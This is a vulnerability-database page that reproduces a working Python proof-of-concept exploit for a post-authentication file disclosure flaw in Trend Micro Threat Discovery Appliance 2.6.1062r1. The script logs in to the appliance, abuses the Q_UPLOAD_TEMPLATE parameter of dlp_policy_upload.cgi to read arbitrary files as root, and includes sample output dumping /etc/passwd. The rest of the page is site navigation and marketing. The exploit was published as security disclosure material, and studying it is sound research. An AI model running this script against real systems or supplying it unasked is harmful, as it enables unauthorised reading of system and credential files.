Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Trend Micro Threat Discovery Appliance 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure

🗓️ 20 Apr 2017 00:00:00Reported by Roberto Suggi LiveraniType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 58 Views

Trend Micro Threat Discovery Appliance 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure Vulnerability. Weak authentication, no file protection

Related
Code
`#!/usr/local/bin/python  
"""  
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure Vulnerability  
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/   
File: TDA_InstallationCD.2.6.1062r1.en_US.iso  
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9  
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1  
  
Summary:  
========  
  
There exists a post authenticated file disclosure vulnerability that can be used to leak files as root.  
  
Notes:  
======  
  
- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts...  
  
Example:  
========  
  
saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py  
(+) usage: ./poc.py <target> <pass> <file>  
(+) eg: ./poc.py 172.16.175.123 admin /etc/passwd  
saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py 172.16.175.123 admin123 /etc/passwd  
(+) logged in...  
(+) downloading file...  
root:x:0:0:root:/root:/bin/true  
tda:x:1:1:nobody:/:/bin/true  
monitor:x:1:1:nobody:/:/bin/true  
pcap:x:77:77:tcpdump:/var/log:/bin/true  
saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py 172.16.175.123 admin123 /var/i_dont_exist  
(+) logged in...  
(+) downloading file...  
(-) file: /var/i_dont_exist doesnt exist!  
"""  
  
import re  
import sys  
import requests  
  
requests.packages.urllib3.disable_warnings()  
  
def remove_last_line_from_string(s):  
return s[:s.rfind('\r\n')]  
  
def download_file():  
r = s.get("https://%s/cgi-bin/dlp_policy_upload.cgi?Q_UPLOAD_ID=1&Q_UPLOAD_TEMPLATE=%s" % (t, f), verify=False)  
data = r.text  
if len(data) > 52:  
fdata = str(data).split("\n")  
fdata.pop()  
fdata.pop()  
print '\n'.join(fdata)  
else:  
print "(-) file: %s doesnt exist!" % f  
  
if len(sys.argv) != 4:  
print "(+) usage: %s <target> <pass> <file>" % sys.argv[0]  
print "(+) eg: %s 172.16.175.123 admin /etc/passwd" % sys.argv[0]  
sys.exit(-1)  
  
t = sys.argv[1]  
p = sys.argv[2]  
f = sys.argv[3]  
  
bu = "https://%s/" % t  
l_url = "%scgi-bin/logon.cgi" % bu  
  
s = requests.Session()  
  
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)  
if "frame.cgi" in r.text:  
print "(+) logged in..."  
print "(+) downloading file..."  
download_file()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Apr 2017 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.89354
trend microthreat discoveryinformation disclosureweak authenticationfile protection
58